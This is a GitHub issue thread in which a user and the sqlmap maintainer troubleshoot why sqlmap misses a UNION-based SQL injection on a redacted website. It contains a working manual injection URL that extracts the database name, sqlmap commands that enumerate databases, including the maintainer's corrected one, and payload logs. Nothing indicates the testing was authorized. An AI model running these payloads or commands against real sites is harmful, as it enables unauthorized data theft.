### ISSUE TITLE
sqlmap cant detect vuln

### ISSUE THREAD

**Issue by TonyStark** [sqlmapproject/sqlmap#2986]
## What's the problem (or question)?
Problem: Sqlmap Cant detect Vulnerability. However in browser i can easily get version, database name.
```url:http://---.com/?id=-2 union select 1,database(),3,4,5,6,7,8--+```
above url print database easily.
but not work in sqlmap somehow.
## What are the running context details?
Here is sqlmap command which i used
`./sqlmap.py -u "http://---.com/?id=2" --dbms=mysql --technique=U --union-cols=8 --suffix=--+ -v2 --prefix="" --union-char=2 --random-agent --dbs --hex`
i also try with level, risk parameter but not working.

**Comment by stamparm** [comment]
Have you took a look into the requests and responses?

**Comment by TonyStark** [comment]
i did
whenever i start sqlmap i got
`[13:34:09] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable`
and here is log

> [13:35:21] [INFO] testing 'Generic UNION query (2) - 8 to 8 columns (custom)'
> [13:35:21] [PAYLOAD] 2 UNION ALL SELECT 2,2,CONCAT(0x71786a6271,0x7451796678414147564d76456154785341654e54446b6a416b647266764158444348514e48495643,0x7176707171),2,2,2,2,2--+
> [13:35:21] [TRAFFIC OUT] HTTP request [#4]:
> GET /?id=2%20UNION%20ALL%20SELECT%202%2C2%2CCONCAT%280x71786a6271%2C0x7451796678414147564d76456154785341654e54446b6a416b647266764158444348514e48495643%2C0x7176707171%29%2C2%2C2%2C2%2C2%2C2--%2B HTTP/1.1
> Host: www.----
> Cache-control: no-cache
> Accept-encoding: gzip,deflate
> Accept: */*
> User-agent: xxxx
> Connection: close
> 
> [13:35:25] [TRAFFIC IN] HTTP response [#4] (200 OK):
> Transfer-encoding: chunked
> Set-cookie: xxxxx
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Uri: http://---/?id=2%20UNION%20ALL%20SELECT%202%2C2%2CCONCAT%280x71786a6271%2C0x7451796678414147564d76456154785341654e54446b6a416b647266764158444348514e48495643%2C0x7176707171%29%2C2%2C2%2C2%2C2%2C2--%2B
> Server: Apache
> Connection: close
> Link: <http://---/?p=329>; rel=shortlink
> Pragma: no-cache
> Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
> Date: Thu, 15 Mar 2018 08:05:20 GMT
> Content-type: text/html; charset=UTF-8
> X-pingback: http://---/xmlrpc.php

**Comment by stamparm** [comment]
I see only headers, without response body. So, you are getting empty responses?

**Comment by stamparm** [comment]
I see only headers, without response body. So, you are getting empty responses?

**Comment by stamparm** [comment]
Have you tried to find out in any way what is going on? I have a feeling that the reason is trivial. I can't ping pong like this without any usable data

**Comment by TonyStark** [comment]
however body has very large content.

**Comment by klensy** [comment]
sqlmap version?

**Comment by stamparm** [comment]
@TonyStark can you give any useful information regarding the requests and responses? Maybe traffic file (`..... -t traffic.txt`) to `miroslav@sqlmap.org`?

**Comment by TonyStark** [comment]
@klensy  1.2.3.26#dev
@stamparm can i send you that site url?

**Comment by stamparm** [comment]
@TonyStark you can send, but if there was no problem from the beginning I won't receive more urls from you

**Comment by stamparm** [comment]
This works: `./sqlmap.py -u "http://---.com/?id=2" --technique=BU --union-cols=8 --union-char=2 --random-agent --dbs --hex`

p.s. You've put dummy `+` into the `--suffix` while that same `+` wasn't interpreted as space (it was being further URL encoded) <- this is a normal sqlmap behavior. Use regular space in such cases (e.g. `--suffix="-- -"`)
